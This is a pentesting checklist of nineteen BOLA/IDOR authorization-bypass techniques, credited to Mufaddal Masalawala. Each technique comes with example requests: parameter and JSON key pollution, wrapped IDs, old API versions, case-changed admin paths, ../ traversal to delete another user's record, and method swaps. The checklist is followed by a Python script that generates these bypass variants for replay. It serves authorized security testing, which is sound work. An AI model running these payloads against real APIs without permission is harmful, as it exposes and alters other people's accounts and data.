Bypass Object Level Authorization (BOLA / IDOR) checklist
  1. Add an ID parameter to the endpoint if it is not present by default, then check whether the response now contains the victim's data instead of your own.
    1. GET /api_v1/messages → 200 OK (your own messages)
    2. GET /api_v1/messages?user_id=victim_uuid → 200 OK (victim's messages)
  2. HTTP Parameter Pollution. Send the same parameter twice; frameworks differ on whether the first or the last value wins, so try both orders.
    1. GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID
    2. GET /api_v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
  3. Change the file type. Append a different file extension, e.g. .json, .xml, .config
    1. GET /user_data/2341 → 401 Unauthorized
    2. GET /user_data/2341.json → 200 OK
  4. JSON Parameter Pollution. Repeat the key in the JSON body; most parsers keep the last occurrence, so try both orders.
    1. POST /api/get_profile
       Content-Type: application/json
       {"user_id":<legit_id>,"user_id":<victim_id>}
  5. Wrap the ID in an array in the body.
    1. {"id":111} → 401 Unauthorized
    2. {"id":[111]} → 200 OK
  6. Wrap the ID in a JSON object.
    1. {"id":111} → 401 Unauthorized
    2. {"id":{"id":111}} → 200 OK
  7. Test outdated API versions. Older versions are often still deployed with weaker checks.
    1. GET /v3/users_data/1234 → 403 Forbidden
    2. GET /v1/users_data/1234 → 200 OK
  8. Test the same endpoint as used by the mobile application.
    1. The web application may use encoded or hashed IDs while the mobile endpoint still accepts sequential numeric IDs.
  9. Do not give up on error messages.
    1. Applications sometimes return an error even though the backend executed the request; verify the side effect (e.g. whether the victim's record actually changed) rather than trusting the response.
  10. Brute-force hidden HTTP parameters.
    1. Use tools such as Arjun or Param Miner (Burp extension) to try common ID parameter names against the endpoint and see whether any of them is honoured.
  11. Google Dorking / public forums
    1. Search for indexed URLs of the application that contain IDs; the search engine may already have crawled endpoints with object identifiers in them.
  12. Never ignore encoded or hashed IDs.
    1. Create multiple accounts and compare the IDs assigned to them to work out the pattern the application uses to allot an ID (e.g. an encoding of a sequential number), so that other users' IDs can be derived.
  13. Send a wildcard instead of an ID. Some backends pass the value straight into a lookup and return every object.
    1. GET /api/users/<user_id>/ → GET /api/users/*
  14. Swap two UUIDs. Create two accounts and request each account's objects from the other account's session (the Autorize Burp extension automates this replay with a second set of session cookies).
    1. Logged in as account 1: GET /v1/orders?cartid=<account_2_cart_id> → 200 OK
  15. Missing Function Level Access Control (MFLAC). Check whether the access rule matches the path case-sensitively while the router does not.
    1. GET /admin/profile → 401 Unauthorized
    2. GET /ADMIN/profile → 200 OK
  16. Swap non-numeric IDs for numeric ones.
    1. GET /file?id=90ri2xozifke29ikedaw0d → GET /file?id=302
  17. Change the request Content-Type; a different body parser may be wired to a different (or no) authorization check.
    1. Content-Type: application/xml → Content-Type: application/json
  18. Secondary-context path traversal. If a front end (gateway or reverse proxy) authorizes on the path it sees but the backend normalizes ../ before routing, the check and the action apply to different objects.
    1. POST /users/delete/VICTIM_ID → 403 Forbidden
    2. POST /users/delete/MY_ID/../VICTIM_ID → 200 OK
  19. Change the HTTP method; authorization rules are sometimes bound to a specific verb.
    1. GET /users/delete/VICTIM_ID → 403 Forbidden
    2. POST /users/delete/VICTIM_ID → 200 OK
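The request mutations in the checklist above can be generated mechanically. The following Python script is an added example (not part of the original checklist or its author's tooling): it takes a baseline request and returns the variants to replay for the parameter, body, path and method tricks, and shows with Python's json module why the order of duplicated keys matters (the standard parser keeps the last occurrence; a first-wins front end is simulated with object_pairs_hook). All IDs, paths and parameter names in it are placeholders, and it sends nothing on its own.

```python
"""Generate BOLA/IDOR bypass variants of a baseline request for replay.

Added example for the checklist above; it is not the author's tooling. It sends
nothing: each function returns candidate requests that a tester replays with
Burp/Autorize or a small HTTP client and then diffs against the baseline.
All IDs, paths and parameter names below are placeholders.
"""
import json
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

COMPACT = (",", ":")  # JSON separators, so generated bodies are byte-predictable


def query_variants(url, param, my_id, victim_id):
    """Items 1, 2 and 13: add the ID parameter, HPP in both orders, wildcard."""
    parts = urlsplit(url)
    base = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    candidates = [
        base + [(param, victim_id)],                   # plain added parameter
        base + [(param, my_id), (param, victim_id)],   # HPP, victim last (last-wins parsers)
        base + [(param, victim_id), (param, my_id)],   # HPP, victim first (first-wins parsers)
        base + [(param, "*")],                         # wildcard instead of an ID
    ]
    # safe="*" keeps the wildcard literal instead of encoding it as %2A
    return [urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(q, safe="*"), parts.fragment))
            for q in candidates]


def json_body_variants(body, key, my_id, victim_id):
    """Items 4, 5 and 6: duplicate key, array-wrapped and object-wrapped ID.

    The duplicate-key body is assembled as text because a Python dict
    cannot hold the same key twice."""
    others = {k: v for k, v in body.items() if k != key}
    prefix = json.dumps(others, separators=COMPACT)[:-1]  # drop the closing brace
    sep = "," if others else ""
    dup = (f"{prefix}{sep}{json.dumps(key)}:{json.dumps(my_id)},"
           f"{json.dumps(key)}:{json.dumps(victim_id)}}}")
    return {
        "plain": json.dumps({**others, key: victim_id}, separators=COMPACT),
        "duplicate_key": dup,
        "array_wrapped": json.dumps({**others, key: [victim_id]}, separators=COMPACT),
        "object_wrapped": json.dumps({**others, key: {key: victim_id}}, separators=COMPACT),
    }


def path_variants(path, my_id, victim_id):
    """Items 3, 7, 15 and 18 for a path that already contains victim_id."""
    out = [path + ext for ext in (".json", ".xml", ".config")]      # file-type change
    m = re.search(r"/v(\d+)/", path)                                  # older API versions
    if m:
        out += [path.replace(m.group(0), f"/v{n}/", 1) for n in range(1, int(m.group(1)))]
    # secondary-context traversal: the front end sees MY_ID, the backend normalizes to VICTIM_ID
    out.append(path.replace(f"/{victim_id}", f"/{my_id}/../{victim_id}", 1))
    segs = path.split("/")                                            # case change per segment
    for i, seg in enumerate(segs):
        if seg and seg != str(victim_id) and seg.upper() != seg:
            out.append("/".join(segs[:i] + [seg.upper()] + segs[i + 1:]))
    return out


def method_variants(method):
    """Item 19: every other common verb for the same path."""
    return [m for m in ("GET", "POST", "PUT", "PATCH", "DELETE") if m != method.upper()]


def last_wins(raw_json, key):
    """Python's json (like most parsers) keeps the LAST duplicate key."""
    return json.loads(raw_json)[key]


def first_wins(raw_json, key):
    """Simulates a first-wins parser, e.g. an authorization layer with its own JSON
    handling. Reversing the pairs makes the first occurrence overwrite the rest."""
    return json.loads(raw_json, object_pairs_hook=lambda pairs: dict(reversed(pairs)))[key]


if __name__ == "__main__":
    for u in query_variants("/api_v1/messages?page=1", "user_id", "ATTACKER_ID", "VICTIM_ID"):
        print("GET", u)
    bodies = json_body_variants({"id": 111}, "id", 111, 222)
    for name, raw in bodies.items():
        print(f"POST /api/get_profile  {name}: {raw}")
    dup = bodies["duplicate_key"]
    # if the authz layer is first-wins and the handler last-wins, the check passes
    # for 111 while the handler acts on 222
    print("duplicate key: authz sees", first_wins(dup, "id"), "handler sees", last_wins(dup, "id"))
    for p in path_variants("/v3/users_data/1234", "5678", "1234"):
        print("GET", p)
    print("verbs to try:", method_variants("GET"))
```

Replay each variant with the same session as the baseline and compare status code and body; a 200 with the victim's data, or a side effect on the victim's object, is the finding, not the status code alone (item 9).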
Created by: Mufaddal Masalawala | Twitter: @muffymas | notes.mufaddal.info